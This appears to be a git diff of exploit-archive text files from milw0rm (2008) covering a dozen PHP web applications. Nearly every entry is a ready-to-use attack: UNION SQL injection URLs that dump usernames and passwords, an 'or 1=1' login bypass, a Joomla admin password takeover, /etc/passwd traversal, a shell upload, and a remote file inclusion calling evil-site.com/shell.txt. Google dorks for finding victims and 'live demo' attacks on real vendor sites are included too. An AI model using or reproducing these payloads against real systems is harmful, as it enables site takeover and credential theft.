@@ -1,48 +1,48 @@ - - ######################################################################## - # # - # ...:::::psipuss version 1.0 SQL Injection Vulnerabilities ::::.... # - ######################################################################## - -Virangar Security Team - -www.virangar.net -www.virangar.ir - --------- -Discoverd By :virangar security team(hadihadi) - -special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra - -& all virangar members & all hackerz - -greetz:to my best friend in the world hadi_aryaie2004 -& my lovely friend arash(imm02tal) from ISCN :) ------------------------------------ -vuln code in categories.php: -line 5: if(!empty($_GET[Cid])) -{ - $qCTitle = "select * from `categories` where `Cid` = '$_GET[Cid]'"; ------------- -exploit: -http://site.com/categories.php?Cid='/**/union/**/select/**/1,concat(Username,0x3a,char(58),Password),3,4,5/**/from/**/users/* --------------------------------- - .::::admin Authentication bypass vuln::::. -vuln code in login.php: - - -line 6: $Username = strip_tags($_POST[username]); -line 7: $Password = strip_tags($_POST[password]); -.. -.. -.. -line 18: $password11 = $_POST[password]; -line 19: $qlogin = "select * from `users` where `Username` = '$Username' and `Password` = '$password11' and `Status` = 'Active'"; ---- -Exploit: -User Name:admin ' or 1=1/* -Password :[whatever] ---- -young iranian h4ck3rz - -# milw0rm.com [2008-08-10] + + ######################################################################## + # # + # ...:::::psipuss version 1.0 SQL Injection Vulnerabilities ::::.... 
# + ######################################################################## + +Virangar Security Team + +www.virangar.net +www.virangar.ir + +-------- +Discoverd By :virangar security team(hadihadi) + +special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra + +& all virangar members & all hackerz + +greetz:to my best friend in the world hadi_aryaie2004 +& my lovely friend arash(imm02tal) from ISCN :) +----------------------------------- +vuln code in categories.php: +line 5: if(!empty($_GET[Cid])) +{ + $qCTitle = "select * from `categories` where `Cid` = '$_GET[Cid]'"; +------------ +exploit: +http://site.com/categories.php?Cid='/**/union/**/select/**/1,concat(Username,0x3a,char(58),Password),3,4,5/**/from/**/users/* +-------------------------------- + .::::admin Authentication bypass vuln::::. +vuln code in login.php: + + +line 6: $Username = strip_tags($_POST[username]); +line 7: $Password = strip_tags($_POST[password]); +.. +.. +.. +line 18: $password11 = $_POST[password]; +line 19: $qlogin = "select * from `users` where `Username` = '$Username' and `Password` = '$password11' and `Status` = 'Active'"; +--- +Exploit: +User Name:admin ' or 1=1/* +Password :[whatever] +--- +young iranian h4ck3rz + +# milw0rm.com [2008-08-10] diff --git a/platforms/php/webapps/6228.txt b/platforms/php/webapps/6228.txt index 5e4cc19bc..56154199b 100755 --- a/platforms/php/webapps/6228.txt +++ b/platforms/php/webapps/6228.txt 
@@ -1,23 +1,23 @@ -#OpenImpro 1.1(id) Sql Injection Vulnerability - - - -#Author: nuclear - - - -#script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip - - - -#exploit: target.com/image.php?id=-1 union select 1,2,concat(firstname,0x3a,lastname,0x3a,password),4,5,6 from im_person -- - - -#Description: -when you do the injection you will be asked to download a file called image.php . Save it,open with any -texteditor and get your password ;). - - -#greetz cAs, Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, and me :P - -# milw0rm.com [2008-08-10] +#OpenImpro 1.1(id) Sql Injection Vulnerability + + + +#Author: nuclear + + + +#script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip + + + +#exploit: target.com/image.php?id=-1 union select 1,2,concat(firstname,0x3a,lastname,0x3a,password),4,5,6 from im_person -- + + +#Description: +when you do the injection you will be asked to download a file called image.php . Save it,open with any +texteditor and get your password ;). + + +#greetz cAs, Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, and me :P + +# milw0rm.com [2008-08-10] diff --git a/platforms/php/webapps/6230.txt b/platforms/php/webapps/6230.txt index 18fcf8b13..41e8e15e5 100755 --- a/platforms/php/webapps/6230.txt +++ b/platforms/php/webapps/6230.txt 
@@ -1,49 +1,49 @@ -|___________________________________________________| -| -| ZeeBuddy v2.1(adid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script : http://www.zeescripts.com -| -|___________________________________________________| - -Exploit: - -www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- - - - -L!VE DEMO: : - - -http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,version(),4,5,6,7,8,9+from+admin-- - - -http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- - - - -____________________________( Greetz )____________________________ -| -| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke -| -| CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n -| -|_________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-08-11] +|___________________________________________________| +| +| ZeeBuddy v2.1(adid) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script : http://www.zeescripts.com +| +|___________________________________________________| + +Exploit: + +www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- + + + +L!VE DEMO: : + + +http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,version(),4,5,6,7,8,9+from+admin-- + + 
+http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- + + + +____________________________( Greetz )____________________________ +| +| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke +| +| CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n +| +|_________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-08-11] diff --git a/platforms/php/webapps/6231.txt b/platforms/php/webapps/6231.txt index c9b7b33d2..6d7d038ab 100755 --- a/platforms/php/webapps/6231.txt +++ b/platforms/php/webapps/6231.txt @@ -1,16 +1,16 @@ -Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities -cript : Ppim v1.0 -Download : http://scripts.ringsworld.com/organizers/ppim.zip -By Stack -Poc 1: change password -for change password go to this link -http://localhost/ppim/changepassword.php -writhe your password and confirm it - -Poc 2 : upload -http://localhost/ppim/upload.php -you can upload you php shell in this link -after you go here -http://localhost/ppim/shell.php - -# milw0rm.com [2008-08-11] +Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities +cript : Ppim v1.0 +Download : http://scripts.ringsworld.com/organizers/ppim.zip +By Stack +Poc 1: change password +for change password go to this link +http://localhost/ppim/changepassword.php +writhe your password and confirm it + +Poc 2 : upload +http://localhost/ppim/upload.php +you can upload you php shell in this link +after you go here +http://localhost/ppim/shell.php + +# milw0rm.com [2008-08-11] diff --git a/platforms/php/webapps/6232.txt b/platforms/php/webapps/6232.txt index 5b65e744a..713987394 100755 --- a/platforms/php/webapps/6232.txt +++ b/platforms/php/webapps/6232.txt 
@@ -1,28 +1,28 @@ -##################################################################################### -#### Ovidentia 6.6.5 Sql Injection #### -##################################################################################### -# # -#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Our Site : Http://IRCRASH.COM # -#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # -##################################################################################### -# # -#Script Download : www.ovidentia.org # -# # -#DORK : "Powered by Ovidentia" # -# # -##################################################################################### -# [Bug] # -# # -#http://Site/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/* -# # -# [Note] # -# # -#You must login by a simple user and then use bug ;) # -# # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### - -# milw0rm.com [2008-08-11] +##################################################################################### +#### Ovidentia 6.6.5 Sql Injection #### +##################################################################################### +# # +#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # +##################################################################################### +# # +#Script Download : www.ovidentia.org # +# # +#DORK : "Powered by Ovidentia" # +# # +##################################################################################### +# [Bug] # +# # 
+#http://Site/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/* +# # +# [Note] # +# # +#You must login by a simple user and then use bug ;) # +# # +##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### + +# milw0rm.com [2008-08-11] diff --git a/platforms/php/webapps/6233.txt b/platforms/php/webapps/6233.txt index bfe2d118f..be4b42705 100755 --- a/platforms/php/webapps/6233.txt +++ b/platforms/php/webapps/6233.txt 
@@ -1,20 +1,20 @@ -####################################################### -########## BBlog 0.7.6 SQL Injection Vuln ############# -####################################################### -# -# Vulnpath: /bblog_plugins/builtin.help.php -# -# Vuln: if($_GET['mod']) $pluginrow = $bBlog->get_row("select * from ".T_PLUGINS." where name='".$_GET['mod']."' and type='modifier'"); -# -# -# -# PoC: ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bb_authors-- -# -# help: On the number you can see you have to set: -# concat_ws(0x3a,id,nickname,password,email,icq) -# -# -# Found by: IP-Sh0k -####################################################### - -# milw0rm.com [2008-08-12] +####################################################### +########## BBlog 0.7.6 SQL Injection Vuln ############# +####################################################### +# +# Vulnpath: /bblog_plugins/builtin.help.php +# +# Vuln: if($_GET['mod']) $pluginrow = $bBlog->get_row("select * from ".T_PLUGINS." where name='".$_GET['mod']."' and type='modifier'"); +# +# +# +# PoC: ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bb_authors-- +# +# help: On the number you can see you have to set: +# concat_ws(0x3a,id,nickname,password,email,icq) +# +# +# Found by: IP-Sh0k +####################################################### + +# milw0rm.com [2008-08-12] diff --git a/platforms/php/webapps/6234.txt b/platforms/php/webapps/6234.txt index 1deb32bed..6a57cd1fa 100755 --- a/platforms/php/webapps/6234.txt +++ b/platforms/php/webapps/6234.txt 
@@ -1,90 +1,90 @@ -##################################################################################### -#### Joomla 1.5.x Remote Admin Password Change #### -##################################################################################### -# # -# Author: d3m0n (d3m0n@o2.pl) # -# Greets: GregStar, gorion, d3d!k # -# # -# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff # -# # -##################################################################################### - - - -File : /components/com_user/controller.php - -##################################################################################### -Line : 379-399 - - function confirmreset() - { - // Check for request forgeries - JRequest::checkToken() or die( 'Invalid Token' ); - - // Get the input - $token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1} - - // Get the model - $model = &$this->getModel('Reset'); - - // Verify the token - if ($model->confirmReset($token) === false) < --- {2} - { - $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError()); - $this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message); - return false; - } - - $this->setRedirect('index.php?option=com_user&view=reset&layout=complete'); - } - -##################################################################################### - -File : /components/com_user/models/reset.php - -Line: 111-130 - - - - function confirmReset($token) - { - global $mainframe; - - $db = &JFactory::getDBO(); - $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3} - - // Verify the token - if (!($id = $db->loadResult())) - { - $this->setError(JText::_('INVALID_TOKEN')); - return false; - } - - // Push the token and user id into the session - $mainframe->setUserState($this->_namespace.'token', $token); - $mainframe->setUserState($this->_namespace.'id', $id); - - return true; - } 
-##################################################################################### - - - -{1} - Replace ' with empty char -{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' " - - -Example : - - -1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm - -2. Write into field "token" char ' and Click OK. - -3. Write new password for admin - -4. Go to url : target.com/administrator/ - -5. Login admin with new password - -# milw0rm.com [2008-08-12] +##################################################################################### +#### Joomla 1.5.x Remote Admin Password Change #### +##################################################################################### +# # +# Author: d3m0n (d3m0n@o2.pl) # +# Greets: GregStar, gorion, d3d!k # +# # +# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff # +# # +##################################################################################### + + + +File : /components/com_user/controller.php + +##################################################################################### +Line : 379-399 + + function confirmreset() + { + // Check for request forgeries + JRequest::checkToken() or die( 'Invalid Token' ); + + // Get the input + $token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1} + + // Get the model + $model = &$this->getModel('Reset'); + + // Verify the token + if ($model->confirmReset($token) === false) < --- {2} + { + $message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError()); + $this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message); + return false; + } + + $this->setRedirect('index.php?option=com_user&view=reset&layout=complete'); + } + +##################################################################################### + +File : /components/com_user/models/reset.php + +Line: 111-130 + + + + function 
confirmReset($token) + { + global $mainframe; + + $db = &JFactory::getDBO(); + $db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3} + + // Verify the token + if (!($id = $db->loadResult())) + { + $this->setError(JText::_('INVALID_TOKEN')); + return false; + } + + // Push the token and user id into the session + $mainframe->setUserState($this->_namespace.'token', $token); + $mainframe->setUserState($this->_namespace.'id', $id); + + return true; + } +##################################################################################### + + + +{1} - Replace ' with empty char +{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' " + + +Example : + + +1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm + +2. Write into field "token" char ' and Click OK. + +3. Write new password for admin + +4. Go to url : target.com/administrator/ + +5. Login admin with new password + +# milw0rm.com [2008-08-12] diff --git a/platforms/php/webapps/6235.txt b/platforms/php/webapps/6235.txt index b00dcb5f8..e028de1d3 100755 --- a/platforms/php/webapps/6235.txt +++ b/platforms/php/webapps/6235.txt 
@@ -1,26 +1,26 @@ -=---------------------------------------------= -= ,.:oO0^-^0Oo:., = -= JIKO = -= '':0Oov-voO0:'' = -=---------------------------------------------= -----------------------=JIKO=------------------- -| Autor :> jiko -| Home :> WwW.No-Exploit.CoM -| Script :> gelato CMS -| Bug :> Remote File Disclosure Vulnerability -| Download :> http://www.gelatocms.com/ -_______________________________________________ -= JIKI TEAm = -_______________________________________________ -| Exploit: -.:|http://localhost/[Script]/classes/imgsize.php?img=[file] -~EX -.:|http://localhost/[script]/classes/imgsize.php?img=../index.php -| Greetz : -.:| Stack & Gold_M & HaCkeR_EgY All Member wwW.No-Exploit.CoM -----------------------=JIKO=------------------- -=---------------------------------------------= -= JIKI TEAm = -=---------------------------------------------= - -# milw0rm.com [2008-08-13] +=---------------------------------------------= += ,.:oO0^-^0Oo:., = += JIKO = += '':0Oov-voO0:'' = +=---------------------------------------------= +----------------------=JIKO=------------------- +| Autor :> jiko +| Home :> WwW.No-Exploit.CoM +| Script :> gelato CMS +| Bug :> Remote File Disclosure Vulnerability +| Download :> http://www.gelatocms.com/ +_______________________________________________ += JIKI TEAm = +_______________________________________________ +| Exploit: +.:|http://localhost/[Script]/classes/imgsize.php?img=[file] +~EX +.:|http://localhost/[script]/classes/imgsize.php?img=../index.php +| Greetz : +.:| Stack & Gold_M & HaCkeR_EgY All Member wwW.No-Exploit.CoM +----------------------=JIKO=------------------- +=---------------------------------------------= += JIKI TEAm = +=---------------------------------------------= + +# milw0rm.com [2008-08-13] diff --git a/platforms/php/webapps/6247.txt b/platforms/php/webapps/6247.txt index 7d407f754..1ba4eff0a 100755 --- a/platforms/php/webapps/6247.txt +++ b/platforms/php/webapps/6247.txt 
@@ -1,21 +1,21 @@ -++++++++++++++++++++++++++++++++++++++++++++++++++++++ -+ script:dotCMS -+ home: http://www.dotcms.org -+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot -+ founder: Don of h4cky0u.org -+ Vulnerability: Directory traversal -++++++++++++++++++++++++++++++++++++++++++++++++++++++ - -exploit: -/index.dot?id=../../../../../../../../etc/passwd%00.jpg -/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html - -example: -http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg -http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html - -solution: -Script should filter meta characters from user input. -+++++++++++++++++++++++++++++++++++++++++++++++++++++++ - -# milw0rm.com [2008-08-15] +++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++ script:dotCMS ++ home: http://www.dotcms.org ++ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot ++ founder: Don of h4cky0u.org ++ Vulnerability: Directory traversal +++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +exploit: +/index.dot?id=../../../../../../../../etc/passwd%00.jpg +/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html + +example: +http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg +http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html + +solution: +Script should filter meta characters from user input. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ + +# milw0rm.com [2008-08-15] diff --git a/platforms/php/webapps/6249.txt b/platforms/php/webapps/6249.txt index 63ade73c7..f9b27a2b1 100755 --- a/platforms/php/webapps/6249.txt +++ b/platforms/php/webapps/6249.txt 
@@ -1,60 +1,60 @@ -|___________________________________________________| -| -| ZEEJOBSITE v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.tryag.cc/cc -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -|___________________________________________________ -| | -| -| script http://zeeways.com/main/products/ZEEJOBSITE-v2.0.html -| -| DorK : inurl:employer_profile.php?compid= -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- - - - - -L!VE DEMO: -_________ - - -http://www.zeejobsite.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- - - - - -___________________ - - -Admin LogiN : - -www.[target].com/Script/admin/ - - -____________________________( Greetz )____________________________ -| -| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | -| -| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke -|_________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-08-15] +|___________________________________________________| +| +| ZEEJOBSITE v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : www.tryag.cc/cc +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +|___________________________________________________ +| | +| +| script http://zeeways.com/main/products/ZEEJOBSITE-v2.0.html +| +| DorK : inurl:employer_profile.php?compid= +|___________________________________________________| + +Exploit: +________ + + + 
+www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- + + + + +L!VE DEMO: +_________ + + +http://www.zeejobsite.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- + + + + +___________________ + + +Admin LogiN : + +www.[target].com/Script/admin/ + + +____________________________( Greetz )____________________________ +| +| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | +| +| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke +|_________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-08-15] diff --git a/platforms/php/webapps/6250.txt b/platforms/php/webapps/6250.txt index d3ab9b04a..d0664c769 100755 --- a/platforms/php/webapps/6250.txt +++ b/platforms/php/webapps/6250.txt 
@@ -1,31 +1,31 @@ -##################################################################################### -#### DeeEmm CMS Sql Injection/Rfi #### -##################################################################################### -# # -#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # -#Our Site : Http://IRCRASH.COM # -#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # -##################################################################################### -# # -#Script Download : http://surfnet.dl.sourceforge.net/sourceforge/dmcms/dmcms_074.tar.gz -# # -#Home Page : www.deeemm.com # -# # -#DORK : "DeeEmm CMS" # -# # -##################################################################################### -# [Rfi] # -# # -#http://Site/user_language.php?INDM=r3d.w0rm&language_dir=http://evil-site.com/shell.txt? -# # -# [Sql Injection] # -# # -#http://Site/index.php?page=media`+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users/* # -#http://Site/index.php?page=media&id=-99999+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users # -# # -##################################################################################### -# Site : Http://IRCRASH.COM # -###################################### TNX GOD ###################################### - -# milw0rm.com [2008-08-15] +##################################################################################### +#### DeeEmm CMS Sql Injection/Rfi #### +##################################################################################### +# # +#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr)) # +#Our Site : Http://IRCRASH.COM # +#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) # +##################################################################################### +# # +#Script Download : 
http://surfnet.dl.sourceforge.net/sourceforge/dmcms/dmcms_074.tar.gz +# # +#Home Page : www.deeemm.com # +# # +#DORK : "DeeEmm CMS" # +# # +##################################################################################### +# [Rfi] # +# # +#http://Site/user_language.php?INDM=r3d.w0rm&language_dir=http://evil-site.com/shell.txt? +# # +# [Sql Injection] # +# # +#http://Site/index.php?page=media`+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users/* # +#http://Site/index.php?page=media&id=-99999+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users # +# # +##################################################################################### +# Site : Http://IRCRASH.COM # +###################################### TNX GOD ###################################### + +# milw0rm.com [2008-08-15] diff --git a/platforms/php/webapps/6254.txt b/platforms/php/webapps/6254.txt index be2de6913..0a5675081 100755 --- a/platforms/php/webapps/6254.txt +++ b/platforms/php/webapps/6254.txt 
@@ -1,23 +1,23 @@ -################################################################################################################################## -Name: Xnova(Ogame) Remote File Inclusion -Author : NuclearHaxor -Contact MSN: nuclearhaxor@hotmail.com - -homepage of xnova: http://xnova.fr/ - -Vuln file: includes/todofleetcontrol.php -Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;) - -Exploit(this exploit works in 90% targets): - ------- -target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]? -or new version of xnova: -target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]? ------- - -FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r - -################################################################################################################################## - -# milw0rm.com [2008-08-17] +################################################################################################################################## +Name: Xnova(Ogame) Remote File Inclusion +Author : NuclearHaxor +Contact MSN: nuclearhaxor@hotmail.com + +homepage of xnova: http://xnova.fr/ + +Vuln file: includes/todofleetcontrol.php +Vuln line: include($ugamela_root_path . 'includes/functions/FlyingFleetHandler.'.$phpEx); -> but no declared ugamela_root_path ;) + +Exploit(this exploit works in 90% targets): + +------ +target.com/includes/todofleetcontrol.php?ugamela_root_path=[shell]? +or new version of xnova: +target.com/includes/todofleetcontrol.php?xnova_root_path=[shell]? +------ + +FUckZZz to Cybernet1c(2) aka ph4nt0mh4ck3r && Cr4wl aka Raz0r + +################################################################################################################################## + +# milw0rm.com [2008-08-17] diff --git a/platforms/php/webapps/6258.txt b/platforms/php/webapps/6258.txt index b94e2b008..027eee4d2 100755 --- a/platforms/php/webapps/6258.txt 
+++ b/platforms/php/webapps/6258.txt 
@@ -1,46 +1,46 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --- d3hydr8 - jeed - baltazar - P47r1ck - C1c4Tr1Z - beenu # -# --- rsauron - letsgorun - K1u - DON - OutLawz - MAGE --- # -################################################################ -# -# Author: r45c4l and sinner_01 -# -# Home : www.darkc0de.com & ljuska.org -# -# Email : r45c4l@hotmail.com, sinn3r01@gmail.com -# -# Share the c0de! -# -################################################################ -# -# App Name: PHPBasket -# -# Soft.Site: http://www.phpbasket.com/ -# -# Dork: "Powered by PHPBasket" -# -# POC-1:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- -# -# P0C-2:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users-- -# -#Example: -#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- -# -#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users-- -# -################################################################ -# Vuln Discovered 17/08/2008 - -# milw0rm.com [2008-08-17] +################################################################ 
+# .___ __ _______ .___ # +# __| _/____ _______| | __ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --- d3hydr8 - jeed - baltazar - P47r1ck - C1c4Tr1Z - beenu # +# --- rsauron - letsgorun - K1u - DON - OutLawz - MAGE --- # +################################################################ +# +# Author: r45c4l and sinner_01 +# +# Home : www.darkc0de.com & ljuska.org +# +# Email : r45c4l@hotmail.com, sinn3r01@gmail.com +# +# Share the c0de! +# +################################################################ +# +# App Name: PHPBasket +# +# Soft.Site: http://www.phpbasket.com/ +# +# Dork: "Powered by PHPBasket" +# +# POC-1:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- +# +# P0C-2:-=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users-- +# +#Example: +#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+pb4_users-- +# +#http://localhost/product.php?cat_id=2&sub_id=14&pro_id=189+and+1=2+union+all+select+1,2,3,4,concat(use_username,char(58),use_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+pb4_users-- +# +################################################################ +# Vuln Discovered 17/08/2008 + +# milw0rm.com [2008-08-17] diff --git a/platforms/php/webapps/6259.txt b/platforms/php/webapps/6259.txt index 34448a7a0..5744c1c62 100755 --- a/platforms/php/webapps/6259.txt 
+++ b/platforms/php/webapps/6259.txt 
